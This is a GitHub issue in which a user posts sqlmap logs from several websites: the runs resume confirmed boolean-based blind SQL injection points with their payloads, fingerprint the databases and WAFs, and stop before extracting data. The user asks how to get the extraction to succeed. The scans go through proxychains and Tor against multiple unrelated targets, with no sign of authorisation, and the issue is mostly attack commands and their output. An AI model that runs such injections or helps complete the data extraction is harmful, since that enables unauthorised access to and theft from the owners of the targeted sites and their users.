Sqlmap does not extract the data.

Open yusufalbashar opened this issue 1 year ago • 0 comments

After receiving a vulnerability alert and providing the payloads and the type of database system being used, sqlmap displays errors and stops. I have encountered the same error more than 20 times. Several scans have been shared below.

proxychains python3 sqlmap.py -u "https://example.com/" --random-agent 8 --dbs --banner --tor --level 5 --risk 3 
[19:03:54] [INFO] resuming back-end DBMS 'sybase'
[19:03:55] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('JSESSIONID=1MHMaMpwQg4...1783405633;isTopbarhw=false'). Do you want to use thos
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: FORMSGROUP_ID__ (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload:
[19:03:57] [INFO] the back-end DBMS is Sybase
[19:03:57] [INFO] fetching banner
[19:03:57] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:03:57] [INFO] retrieved:
[19:03:59] [INFO] heuristics detected web page charset 'utf-8'

web application technology: JSP
[19:06:12] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:06:12] [INFO] fetching database names
[19:06:12] [INFO] retrieved:
[19:06:17] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'
[19:05:25] [INFO] resuming back-end DBMS 'sap maxdb'
[19:05:26] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ROUTEID=775a6c6ac73...a454f91d94;ROUTE=190513674.47873.0000;cookiesession1=678B286E82B...7259A337FB'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: ln (GET)
    Type: boolean-based blind
    Title: SAP MaxDB boolean-based blind - ORDER BY, GROUP BY clause (original value)
    Payload: ln=javascript',(CASE WHEN 7835=7835 THEN 'javascript' ELSE NULL END)-- kxGG&v=fe11b8cc6e666409572f4e5ec10956abd0d559b9
---
[19:05:27] [INFO] the back-end DBMS is SAP MaxDB
[19:05:27] [INFO] fetching banner
[19:05:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:05:27] [INFO] retrieved:
back-end DBMS: SAP MaxDB
[19:06:44] [INFO] fetching banner
[19:06:44] [INFO] retrieved:
[19:06:47] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:06:47] [INFO] fetching database names
[19:06:47] [INFO] retrieved:
[19:06:49] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 95 times
[19:06:49] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'
[19:07:19] [INFO] resuming back-end DBMS 'postgresql'
[19:07:19] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('sess_map=ftduzsazczc...wcbxaxayfv'). Do you want to use those [Y/n] Y
[19:07:21] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: v (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: v=-3996) OR 9646=9646-- cFhG
---
[19:07:21] [INFO] the back-end DBMS is PostgreSQL
[19:07:21] [INFO] fetching banner
[19:07:21] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[19:07:21] [INFO] retrieved:
back-end DBMS: PostgreSQL (CockroachDB fork)
[19:08:20] [INFO] fetching banner
[19:08:20] [INFO] retrieved:
[19:08:26] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[19:08:26] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[19:08:26] [INFO] fetching database (schema) names
[19:08:26] [INFO] fetching number of databases
[19:08:26] [INFO] retrieved:
[19:08:29] [ERROR] unable to retrieve the number of databases
[19:08:29] [INFO] falling back to current database
[19:08:29] [INFO] fetching current database
[19:08:29] [INFO] retrieved:
[19:08:34] [WARNING] on PostgreSQL you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
[19:08:34] [CRITICAL] unable to retrieve the database names
[19:08:34] [WARNING] HTTP error codes detected during run:
406 (Not Acceptable) - 102 times
[19:08:34] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'
[21:23:32] [INFO] resuming back-end DBMS 'firebird'
[21:23:32] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('__uzma=d5d90482-d8...4779d74d9b;__uzmb=1708539812;__uzme=9174;__uzmc=420601040767;__uzmd=1708539812'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: arg (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: arg=-8049 OR 6019=6019
---
[21:23:32] [INFO] the back-end DBMS is Firebird
[21:23:32] [INFO] fetching banner
[21:23:33] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:23:33] [INFO] retrieved:
[21:26:11] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[21:26:11] [WARNING] on Firebird it is not possible to enumerate databases (use only '--tables')
[21:26:11] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'
[21:27:48] [INFO] resuming back-end DBMS 'mysql'
[21:27:48] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('ASP.NET_SessionId=jqj5srm5lhg...rqlwinbmjq'). Do you want to use those [Y/n] Y
[21:27:52] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: User-Agent (User-Agent)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -5601 OR 8996=8996
---
[21:27:52] [INFO] the back-end DBMS is MySQL
[21:27:52] [INFO] fetching banner
[21:27:52] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[21:27:52] [INFO] retrieved:
[21:27:53] [CRITICAL] WAF/IPS identified as 'Kona Site Defender (Akamai Technologies)'
[21:27:53] [WARNING] potential permission problems detected ('Access Denied')

web server operating system: Windows
web application technology: ASP.NET
back-end DBMS: MySQL 8 (MariaDB fork)
[21:28:04] [INFO] fetching banner
[21:28:04] [INFO] retrieved:
[21:28:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:28:05] [INFO] fetching database names
[21:28:05] [INFO] fetching number of databases
[21:28:05] [INFO] retrieved:
[21:28:05] [ERROR] unable to retrieve the number of databases
[21:28:05] [INFO] falling back to current database
[21:28:05] [INFO] fetching current database
[21:28:05] [INFO] retrieved:
[21:28:06] [CRITICAL] unable to retrieve the database names
[21:28:06] [WARNING] HTTP error codes detected during run:
403 (Forbidden) - 102 times
[21:28:06] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'
[20:22:50] [INFO] resuming back-end DBMS 'firebird'
[20:22:51] [INFO] testing connection to the target URL
[20:22:52] [CRITICAL] previous heuristics detected that the target is protected by some kind of WAF/IPS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: xxx.xxx.xxx.xxx (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: xxx.xxx.xxx.xxx=-3912 OR 2235=2235
---
[20:22:52] [INFO] the back-end DBMS is Firebird
[20:22:52] [INFO] fetching banner
[20:22:53] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:22:53] [INFO] retrieved:
[20:22:54] [CRITICAL] WAF/IPS identified as 'AppWall (Radware)'

back-end DBMS: Firebird 1.0
[20:23:53] [INFO] fetching banner
[20:23:53] [INFO] retrieved:
[20:23:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast'
[20:23:58] [WARNING] on Firebird it is not possible to enumerate databases (use only '--tables')
[20:23:58] [INFO] fetched data logged to text files under 'C:\Users\SALEMTECH\AppData\Local\sqlmap\output\example.com'

What is the solution method for the problem?

yusufalbashar • Feb 21 '24 18:02